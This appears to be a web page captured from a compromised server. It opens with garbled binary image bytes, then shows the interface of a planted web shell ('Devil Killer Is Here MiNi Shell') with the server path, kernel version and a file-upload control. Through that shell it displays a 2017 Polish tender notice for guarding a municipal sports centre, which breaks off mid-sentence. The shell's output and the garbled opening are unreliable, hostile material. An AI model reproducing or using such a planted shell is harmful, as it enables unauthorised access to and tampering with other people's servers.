JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170117/9452-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.nosir.nowydwormaz.pl' target='_blank'>http://www.nosir.nowydwormaz.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 9452 - 2017
              z dnia 2017-01-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nowy Dwór Mazowiecki: Świadczenie usług całodobowego dozoru i ochrony mienia oraz ochrony osób w czasie imprez sportowo-kulturalnych w Nowodworskim Ośrodku Sportu i Rekreacji w Nowym Dworze Mazowieckim<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Nowodworski Ośrodek Sportu i Rekreacji, krajowy numer identyfikacyjny
              1074842300000, ul.
              ul. Sportowa 
              66,
              05100  
              Nowy Dwór Mazowiecki, woj.
              mazowieckie, państwo
              Polska, tel.
              22 775 41 42, e-mail
              krystyna.manowska@nowydwormaz.pl, faks
              22 775 02 08.
              <br />
              Adres strony internetowej (URL): www.nosir.nowydwormaz.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.nosir.nowydwormaz.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />Nowodworski Ośrodek Sportu i Rekreacji, ul. Sportowa 66, 05-100 Nowy Dwór Mazowiecki</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług całodobowego dozoru i ochrony mienia oraz ochrony osób w czasie imprez sportowo-kulturalnych w Nowodworskim Ośrodku Sportu i Rekreacji w Nowym Dworze Mazowieckim<br /><b>Numer referencyjny: </b>ZP/1/O/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część A zamówienia. Przedmiotem zamówienia jest świadczenie usług dozoru i ochrony mienia w obiektach Nowodworskiego  Ośrodka Sportu i Rekreacji w Nowym Dworze Mazowiecki, 
ul. Sportowa 66 (budynek hali sportowej, budynek krytej pływalni, teren wokół budynków, boiska sportowe, budynek trybun) tj. całodobowa usługa dozoru 
i ochrony mienia pełniona non stop przez jednego pracownika ochrony oraz całodobowy monitoring własnymi urządzeniami technicznymi w dni wolne od pracy, tj. w soboty, niedziele i święta. W dni powszednie, tj. w czasie gdy na terenie obiektu przebywają pracownicy, Zamawiający przewiduje pełnienie ochrony od godz. 1500 do godz. 700 dnia następnego. 
Łączna ilość godzin przewidziana w okresie trwania zamówienia wynosi 6176 godzin.

W ramach świadczenia usługi dozoru i ochrony mienia w obiektach NOSiRu, do zadań Wykonawcy należeć będzie w szczególności:
a)	Całodobowe strzeżenie mienia znajdującego się na terenie Zamawiającego przed rabunkiem, zagrożeniem wybuchu, pożarem, napadem, kradzieżą  i kradzieżą z włamaniem,
b)	Udaremnianie prób dokonania kradzieży lub dewastacji mienia chronionego,
c)	Niedopuszczenie do wejścia i przebywania na terenie Zamawiającego osób nieupoważnionych, poza miejscami dostępnymi dla gości,
d)	Ochrona przed kradzieżą lub zniszczeniem pojazdów znajdujących się na terenie parkingów przy ulicy Sportowej 66 w Nowym Dworze Mazowieckim (parking główny, parking wewnętrzny i plac przy  wejściu głównym), w szczególności strzeżenie samochodów gości po zamknięciu parkingu wewnętrznego,
e)	Nadzór i niezwłoczne zgłaszanie Zamawiającemu o wszelkich zauważonych zdarzeniach mogących wpłynąć na substancję chronionego mienia, w szczególności o pożarze, zalaniu, wycieku itp. lub o zagrożeniach ich powstania, w tym podejrzeniu terroryzmu,
f)	Zapobieganie powstaniu innych szkód t.j.; zalanie pomieszczeń, pożar i inne zdarzenia losowe,
g)	Kontrola stanu bezpieczeństwa przeciwpożarowego poprzez właściwą obsługę dozorową systemy p.pożarowego,
h)	Usuwanie z terenów NOSiR osób naruszających spokój, ustalony porządek prawny, Regulaminu Porządkowego  NOSiR, w tym osób nietrzeźwych i pod wpływem środków odurzających,
i)	Prowadzenie stałego monitoringu terenu chronionego przy użyciu co najmniej 44 kamer wizyjnych (w tym 36 kamer Zamawiającego i 8 kamer Wykonawcy) odbiornika wraz z rejestracją kolorowego obrazu i serwisem,
j)	Prowadzenie na bieżąco Dziennika Dozoru,
k)	Przyjmowanie, wydawanie, przechowywanie i rejestrowanie ruchu: kluczy przechowywanych w Portierni,
l)	Udzielanie bieżących informacji osobom z zewnątrz przychodzącym do obiektu NOSiR,
m)	Wykonywanie bieżących poleceń kierownictwa Zamawiającego oraz osoby wyznaczonej w zakresie właściwego zabezpieczenia porządku i powierzonego do ochrony mienia,
n)	Znajomość i stosowanie: regulaminów wewnętrznych Zamawiającego  Regulaminu Porządkowego NOSiR, funkcjonowania i obsługi centrali sygnalizacji pożaru i postępowania alarmowego, instrukcji dyżurnego punktu ostrzegania i alarmowania, podstawowych zasad postępowania w przypadku pożaru, zamachu terrorystycznego i innych zdarzeń.
Część B zamówienia. Świadczenie usług ochrony imprez sportowych, sportowo-rekreacyjnych i kulturalnych w obiektach Nowodworskiego Ośrodka Sportu i Rekreacji w Nowym Dworze Mazowiecki, ul. Sportowa 66 i Młodzieżowa 1, a w szczególności:
a)	Zapewnienie porządku i bezpieczeństwa na imprezach kulturalnych odbywających się w siedzibie Zamawiającego (każdorazowy zakres zadań, okres ochrony i wymagania liczby pracowników ochrony będą zgłaszane z trzydniowym wyprzedzeniem),
b)	Dokonywanie czynności sprawdzających wobec osób wchodzących oraz pojazdów wjeżdżających na teren objęty ochroną (wymagani do tego celu pracownicy obu płci),
c)	Niedopuszczenie do wnoszenia na teren ochraniany materiałów  niebezpiecznych,
d)	Usuwanie z terenu NOSiR osób naruszających spokój, ustalony porządek prawny, a w szczególności Regulamin Porządkowy NOSiR, w tym osób nietrzeźwych i pod wpływem środków odurzających.

Szacunkowa ilość imprez sportowo-rekreacyjnych i kulturalnych, w czasie których Zamawiający korzystać będzie z usług Wykonawcy (część B zamówienia) w okresie 11 miesięcy:

1.Mecz na poziomie III ligi - przewidziano 22 mecze, czas trwania - 4 godz., Ilość  pracowników zabezpieczających imprezę - 12 osób+kierownik ds. bezpieczeństwa
 + karetka, Łączna ilość godzin - 1144.
2. Rozgrywki Ligi Okręgowej - przewidziano 18 meczów, czas trwania - 3 godz., Ilość pracowników zabezpieczających imprezę - 4, Łączna ilość godzin - 216.		
3. Imprezy masowe (kabarety, koncerty itp)- przewidziano 5 imprez, czas trwania - 4 godz., ilość pracowników zabezpieczających imprezę - 18, Łączna ilość godz.-360.
 		
	Łączna ilość godzin w okresie 11 miesięcy - 1720


<br /><br /><b>II.5) Główny kod CPV: </b>79710000-4<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1)	W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika z odrębnych przepisów:
Wykonawca posiada uprawnienia do prowadzenia działalności zawodowej 
w zakresie usług ochrony osób i mienia, tj. Wykonawca posiada koncesję na 
          prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia 
          na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia 
          (j.t. Dz.U. z 2016 r., poz. 1432). 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W zakresie sytuacji finansowej lub ekonomicznej:
 
          Wykonawca posiada sytuację ekonomiczną i finansową zapewniającą wykonanie 
          zamówienia w postaci ubezpieczenia od odpowiedzialności cywilnej w zakresie 
          prowadzonej działalności związanej z przedmiotem zamówienia, o wartości 
          minimum 100.000,00 zł, jednakże zgodnego z przepisami rozporządzenia 
          Ministra Finansów z dnia 9 grudnia 2013 r. w sprawie obowiązkowego 
          ubezpieczenia odpowiedzialności cywilnej przedsiębiorcy wykonującego 
          działalność gospodarczą w zakresie usług ochrony osób i mienia 
          (Dz.U.2013.1550).
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                ) W zakresie zdolności technicznej lub zawodowej:

          Wykonawca posiada zdolność techniczną i zawodową w postaci:
 
doświadczenia w zakresie należytego wykonania, a w przypadku świadczeń okresowych lub ciągłych również wykonywania, łącznie: co najmniej dwóch usług polegających na całodobowej stałej fizycznej ochronie mienia w obiektach użyteczności publicznej o zrealizowanej wartości jednostkowej nie mniejszej niż 150.000,00 zł netto każda - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - to w tym okresie, oraz co najmniej trzech usług ochrony fizycznej biletowanych imprez kulturalnych w obiektach zamkniętych, z liczbą gości nie mniejszą niż 500 osób każda - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - to w tym okresie, (przy czym przez obiekt użyteczności publicznej należy rozumieć: budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny, zaś przez imprezę kulturalną należy rozumieć koncert, wystawę, przedstawienie teatralne, itp., Zamawiający nie kwalifikuje jako imprezy kulturalnej imprez firmowych, towarzyskich, rodzinnych i sportowych.) 

dysponowania osobami skierowanymi przez Wykonawcę do realizacji zamówienia; tj. co najmniej 5 osobami wpisanymi na listę kwalifikowanych pracowników ochrony fizycznej (minimum 2 osobami przeznaczonymi do ochrony imprez posiadającymi doświadczenie w ochronie imprez kulturalnych, minimum 2 osobami w zorganizowanej i zmotoryzowanej grupie interwencyjnej oraz minimum 1 osobą sprawującą nadzór nad pracownikami nie wpisanymi na listę kwalifikowanych pracowników ochrony posiadającą minimum 3-letnie doświadczenie w sprawowaniu nadzoru nad pracownikami ochrony w obiektach użyteczności publicznej, osoba ta sprawująca funkcję kierownika ds. bezpieczeństwa imprez masowych musi posiadać uprawnienia kierownika), jak również co najmniej 3 osobami przeznaczonymi do całodobowego strzeżenia mienia,  

dysponowania samochodu patrolowego oraz systemu monitoringu wizyjnego składającego się z 8 kamer wizyjnych i odbiornika wraz rejestracją kolorowego obrazu (sprzęt kompatybilny z kamerami już obecnymi w obiektach), z serwisem środkami łączności.
 
 Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do niniejszego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. W takiej sytuacji Wykonawca musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 
W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawca może polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
      pkt 13, 14 i 21 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem 
      terminu składania ofert;
2.Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że 
      Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 
      miesiące przed upływem terminu składania ofert lub inny dokument 
      potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem 
      podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub 
      grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie 
      lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania 
      decyzji właściwego organu.
3.Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń 
      Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument 
      potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia 
      społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem 
      terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł 
      porozumienie z właściwym organem w sprawie spłat tych należności wraz 
      z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane 
      prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
      wstrzymanie w całości wykonania decyzji właściwego organu. 
4.Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności 
      gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 
      w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 
      pkt 1 ustawy Pzp. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Oświadczenia aktualne na dzień składania ofert w zakresie wskazanym 
     w Załącznikach nr 2 i 3 do SIWZ jako potwierdzenie, że Wykonawca nie podlega 
     wykluczeniu oraz  spełnia warunki udziału w postępowaniu, 
2. Aktualna koncesja na prowadzenie działalności gospodarczej w zakresie ochrony 
     osób i mienia zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia 
     (j.t. Dz.U. z 2016 r., poz. 1432),
3. Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych 
     również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania 
     ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z 
     podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których 
     usługi zostały wykonane  wg wzoru stanowiącego załącznik nr 4 do SIWZ, oraz 
     załączeniem dowodów określających czy te usługi zostały wykonane lub są 
     wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź 
     inne dokumenty wystawione przez podmiot, na rzecz którego usługi były 
     wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, 
     a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w 
     stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku 
     świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne 
     dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie 
     wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych 
     Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją 
     o podstawie do dysponowania tymi zasobami - wg wzoru stanowiącego załącznik nr 
     5 do SIWZ, 
5.  Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, 
      w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na 
      temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia 
      niezbędnych do wykonania zamówienia publicznego, a także zakresu 
      wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania 
      tymi osobami  wg wzoru stanowiącego załącznik nr 6 do SIWZ,
 6.  Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności 
      cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia 
      o wartości minimum 100.000,00 zł, jednakże zgodnie z przepisami rozporządzenia 
      Ministra Finansów z dnia 9 grudnia 2013 r. w sprawie obowiązkowego 
